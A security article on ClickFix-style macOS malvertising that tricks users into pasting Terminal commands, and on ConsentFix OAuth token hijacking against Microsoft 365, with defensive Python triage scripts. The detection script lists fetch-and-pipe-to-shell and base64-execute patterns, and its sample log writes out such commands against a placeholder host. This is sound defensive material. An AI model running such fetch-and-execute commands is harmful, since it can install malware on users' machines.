Social Engineering Evolution: Analyzing the Rise of macOS ‘ClickFix’ Campaigns and ConsentFix OAuth Hijacking
The cybersecurity landscape is witnessing a sophisticated convergence of social engineering and technical exploitation. Two distinct yet equally alarming methodologies have emerged: a highly targeted macOS infection vector amplified through verified X (formerly Twitter) advertisements, and a novel browser-based hijacking technique known as “ConsentFix,” designed to exfiltrate Microsoft 365 session tokens without the deployment of traditional malware.
Security researchers from Jamf and Malwarebytes have documented a recent campaign on X in which a verified, sponsored account promoted a fraudulent download posing as the macOS utility “DynamicLake.” The lure was built as a lookalike of legitimate Dynamic Island utilities, trading on visual familiarity to earn instant user trust.
The attack chain follows a precise sequence: the advertisement sends users to a lookalike domain, dynamicmacisland[.]com, which instructs them to open the macOS Terminal and paste a command that the page has already placed on the clipboard. That single, seemingly innocuous action sidesteps the controls that would catch a conventional installer: the command runs under the user’s own (often administrative) privileges, a payload fetched from the command line carries no quarantine attribute, so Gatekeeper never prompts, and a fetch-and-execute one-liner leaves little on disk for signature-based antivirus to match. The result is an infostealer closely related to the Atomic Stealer family.
This campaign is particularly effective because it weaponizes three converging pillars of deception: ClickFix-style social engineering (manipulating users into running manual commands), visual brand impersonation (using lookalike domains), and platform authority (using paid, verified ad placements to bypass the user’s natural skepticism).
Historically, “ClickFix” tactics relied on fake “human verification” CAPTCHAs that walked the victim through pasting a command. This iteration carries the same trick to the macOS command line, where it often evades endpoint protection: the commands are entered interactively by the logged-in user into Terminal, a signed Apple application, so there is no unsigned dropper or unexpected child process for security tooling to flag, and the activity looks exactly like an administrator doing their job.
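The clipboard-to-Terminal pattern described above is what an endpoint team would want to detect, and it is also the monitoring the mitigation section below calls for. The following is an added example, not code from the article or from the Jamf and Malwarebytes research it summarizes: a small Python triage routine that scans process-execution records for fetch-and-execute one-liners launched from a terminal application. The record schema (user, parent application, shell, command line) is a constructed simplification of what an Endpoint Security-based EDR exports, and the sample records, including the reserved example.invalid domain, are constructed for illustration.

```python
"""Triage macOS terminal commands for ClickFix-style fetch-and-execute patterns.

Added example; not code from the article or the research it summarizes.  The
record schema below (user, parent application, shell, command line) is a
constructed simplification of what an Endpoint Security-based EDR exports.
"""
import json
import re

# (name, severity, pattern).  Severity 3 = fetch/decode-and-execute in one
# line, 2 = strong supporting sign, 1 = weak sign that only matters combined.
INDICATORS = [
    ("fetch_pipe_shell", 3,
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64_decode_exec", 3,
     re.compile(r"\bbase64\s+(-[dD]|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("quarantine_strip", 2,
     re.compile(r"\bxattr\b.*-d\s+com\.apple\.quarantine")),
    ("osascript_inline", 1, re.compile(r"\bosascript\s+-e\b")),
    ("background_detach", 1, re.compile(r"\bnohup\b|\bdisown\b|&\s*$")),
]

# Interactive terminal apps whose child shells are the ClickFix entry point.
TERMINAL_APPS = {"Terminal", "iTerm2"}
ALERT_THRESHOLD = 2


def classify_command(cmd: str) -> list:
    """Names of every indicator that matches the command line."""
    return [name for name, _sev, rx in INDICATORS if rx.search(cmd)]


def score_command(cmd: str) -> int:
    """Sum of the severities of the matched indicators (0 = nothing matched)."""
    matched = set(classify_command(cmd))
    return sum(sev for name, sev, _rx in INDICATORS if name in matched)


def triage_events(lines) -> list:
    """Parse JSON-lines process records and return alerts for shells spawned
    by a terminal app whose command line reaches ALERT_THRESHOLD."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("parent") not in TERMINAL_APPS:
            continue  # not an interactive terminal session; out of scope here
        score = score_command(ev["cmd"])
        if score >= ALERT_THRESHOLD:
            alerts.append({
                "user": ev["user"],
                "cmd": ev["cmd"],
                "score": score,
                "severity": "high" if score >= 3 else "medium",
                "indicators": classify_command(ev["cmd"]),
            })
    return alerts


# Constructed sample records; example.invalid is a reserved, non-resolving domain.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"user": "alice", "parent": "Terminal", "process": "zsh",
     "cmd": "brew update && brew upgrade"},
    {"user": "alice", "parent": "Terminal", "process": "zsh",
     "cmd": "curl -fsSL https://example.invalid/install.sh | bash"},
    {"user": "bob", "parent": "Terminal", "process": "zsh",
     "cmd": "echo aGVsbG8K | base64 -d | sh"},
    {"user": "bob", "parent": "Terminal", "process": "zsh",
     "cmd": "xattr -d com.apple.quarantine ~/Downloads/tool.dmg"},
    {"user": "carol", "parent": "Xcode", "process": "sh",
     "cmd": "curl -s https://example.invalid/x | sh"},
    {"user": "dave", "parent": "Terminal", "process": "zsh",
     "cmd": "osascript -e 'display dialog \"hi\"' &"},
])

if __name__ == "__main__":
    for alert in triage_events(SAMPLE_LOG.splitlines()):
        print(alert["severity"], alert["user"], alert["indicators"], alert["cmd"])
```

Run the file directly to print the alerts for the sample records. The scoring is deliberately simple: a single fetch-or-decode-and-execute indicator is enough for a high-severity alert, while a quarantine strip or a backgrounded osascript only reaches medium severity, and weak indicators on their own stay silent. Tune the indicator list against your own telemetry (developers legitimately pipe installers into shells more often than you would like) before wiring it into an alerting pipeline.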
While macOS users face this command-line threat, Windows and enterprise cloud users are being targeted by ConsentFix—a highly refined technique for Microsoft 365 account takeover that circumvents the need for password theft or traditional malware entirely. ConsentFix manipulates the browser and OAuth authorization flows to trick victims into inadvertently handing over active session tokens.
The attack typically begins with a lure hosted on a trusted service, such as Dropbox. To evade automated security scanners, these links are frequently password-protected. Once accessed, the user is presented with a convincing, yet fraudulent, Microsoft sign-in prompt.

Rather than asking for a password, the interface instructs the user to perform an action that seems technically plausible but is highly irregular: dragging a “localhost” OAuth callback link directly into the browser. Within seconds, the attacker holds the resulting tokens and has immediate access to OneDrive, Teams, and other Microsoft 365 services. Because those tokens are issued by Microsoft through a legitimate authorization flow that the victim completed, any Multi-Factor Authentication (MFA) challenge was satisfied by the victim, and the attacker never has to pass one.
ConsentFix is uniquely dangerous because it subverts the very foundation of modern security awareness training. Users are taught to guard their passwords and avoid suspicious downloads; they are rarely trained to recognize the dangers of manipulating browser URL bars or OAuth redirect flows. This technique has recently been observed circulating on Russian-language cybercrime forums, suggesting an impending increase in volume as it becomes accessible to lower-tier threat actors.
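The dragged “localhost” link is the step that gives ConsentFix away, and link-level inspection is the control this article keeps returning to. The following is an added example, not code from the article or from the researchers it cites: a Python helper that flags Microsoft Entra authorization URLs whose redirect_uri points at a loopback address and whose scopes request a refresh token or broad Graph access, and that shows what a loopback callback URL actually carries (the authorization code). The client_id values, state values, the example.invalid host and the Dropbox path in the sample links are constructed placeholders, not real applications or files. Loopback redirects are legitimate for native and command-line apps, so the output is a triage signal to review, not a verdict.

```python
"""Flag OAuth authorization links and loopback callbacks of the kind ConsentFix abuses.

Added example; not code from the article or the research it cites.  All
client_id and state values, the example.invalid host and the Dropbox path in
the sample links are constructed placeholders, not real applications.
"""
from typing import Optional
from urllib.parse import parse_qs, urlparse

ENTRA_HOSTS = {"login.microsoftonline.com", "login.microsoft.com"}
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Scope families that reach user data broadly; User.Read alone is not listed.
BROAD_SCOPE_PREFIXES = ("Files.", "Mail.", "Sites.", "Directory.", "Chat.", "Calendars.")


def _params(url: str):
    """urlparse() result plus one {name: first_value} map built from the
    query string and the fragment (implicit-flow responses use the fragment)."""
    parsed = urlparse(url)
    merged = {}
    for part in (parsed.query, parsed.fragment):
        for key, values in parse_qs(part).items():
            merged.setdefault(key, values[0])
    return parsed, merged


def is_broad_scope(scope: str) -> bool:
    """True for scopes that grant wide data access or every pre-consented permission."""
    return (scope.endswith(".All") or scope.endswith("/.default")
            or scope.startswith(BROAD_SCOPE_PREFIXES))


def triage_authorize_url(url: str) -> dict:
    """Inspect an Entra authorize URL and report why a phishing lure might use it."""
    parsed, p = _params(url)
    result = {"is_entra_authorize": False, "findings": [], "risk": "none"}
    if (parsed.hostname not in ENTRA_HOSTS or "/oauth2/" not in parsed.path
            or not parsed.path.endswith("/authorize")):
        return result
    result["is_entra_authorize"] = True
    findings = result["findings"]
    redirect = urlparse(p.get("redirect_uri", ""))
    if redirect.hostname in LOOPBACK_HOSTS:
        findings.append("loopback_redirect")  # native-app style; odd in a link sent to a user
    scopes = p.get("scope", "").split()
    if "offline_access" in scopes:
        findings.append("refresh_token_requested")
    broad = [s for s in scopes if is_broad_scope(s)]
    if broad:
        findings.append("broad_scope:" + ",".join(broad))
    if "token" in p.get("response_type", "").split():
        findings.append("implicit_token_response")
    if p.get("prompt") == "consent":
        findings.append("forced_consent_prompt")
    if "loopback_redirect" in findings and len(findings) > 1:
        result["risk"] = "high"
    elif findings:
        result["risk"] = "medium"
    else:
        result["risk"] = "low"
    return result


def parse_loopback_callback(url: str) -> Optional[dict]:
    """Return the OAuth artefacts (code or tokens) carried by a loopback callback
    URL, i.e. what the dragged 'localhost' link hands to whoever can read it."""
    parsed, p = _params(url)
    if parsed.hostname not in LOOPBACK_HOSTS:
        return None
    artefacts = {k: p[k] for k in ("code", "access_token", "id_token", "refresh_token") if k in p}
    return artefacts or None


# Constructed sample links; none of these identifiers belong to a real app.
SAMPLE_LINKS = [
    # a lure-style authorize URL: loopback redirect, refresh token, broad Graph scopes
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555&response_type=code"
    "&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2Fcallback"
    "&scope=openid%20profile%20offline_access%20Files.ReadWrite.All%20Mail.Read"
    "&state=c0nstructed",
    # an ordinary web-app sign-in: https redirect, narrow scope
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=22222222-3333-4444-5555-666666666666&response_type=code"
    "&redirect_uri=https%3A%2F%2Fportal.example.invalid%2Fauth%2Fcallback"
    "&scope=openid%20profile%20User.Read&state=c0nstructed",
    # a non-OAuth file-sharing link
    "https://www.dropbox.com/s/c0nstructed/invoice.pdf",
    # the loopback callback the victim sees after a genuine sign-in
    "http://localhost:5000/callback?code=CONSTRUCTED_AUTH_CODE&state=c0nstructed",
]


def triage_links(links) -> list:
    """Run both checks over URLs seen by a proxy, mail gateway or URL-click log."""
    return [{"url": u, "authorize": triage_authorize_url(u),
             "callback_artefacts": parse_loopback_callback(u)} for u in links]


if __name__ == "__main__":
    for row in triage_links(SAMPLE_LINKS):
        print(row["authorize"]["risk"], row["callback_artefacts"], row["url"][:72])
```

The second check is the one to wire into user-facing tooling: a loopback URL that carries a `code` parameter is a completed authorization response, and anything that asks a user to drag, paste or forward such a URL is asking for the credential itself.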
Defensive Strategies and Mitigation
Protecting against these multi-vector attacks requires a layered defense combining technical controls with behavioral intelligence:
- For macOS Endpoints: Monitor for shells spawned from Terminal that fetch remote content and pipe it straight into an interpreter, decode and execute base64 blobs, or strip the com.apple.quarantine attribute; these are the fingerprints of a pasted ClickFix command. Application allowlists, together with MDM restrictions on what an unprivileged user can install (launch agents, system and kernel extensions), limit what such a command can achieve even when the user runs it willingly.
- For Cloud and SaaS Environments: Strengthen Conditional Access policies, restrict user consent so that ordinary users cannot grant permissions to unverified applications, and enforce sign-in frequency and token lifetime constraints so that a captured token stops working quickly; revoke refresh tokens for any account suspected of compromise. Security Operations Centers (SOC) should prioritize monitoring for anomalous OAuth consent grants and for token issuance to applications, or from client types, that a user has never used before.
- For the Human Element: Training must evolve. Employees should be taught that unexpected “verification” steps requiring browser manipulation (like drag-and-drop actions) are immediate red flags. Furthermore, any link hosted on third-party platforms that requires a password to view should be treated with extreme caution.
Ultimately, these incidents serve as a stark reminder: platform-provided signals—such as verification badges, paid placement status, and familiar login interfaces—are no longer reliable indicators of legitimacy. Vigilant link-level inspection and rapid reporting remain our most effective tools against these evolving social engineering tactics.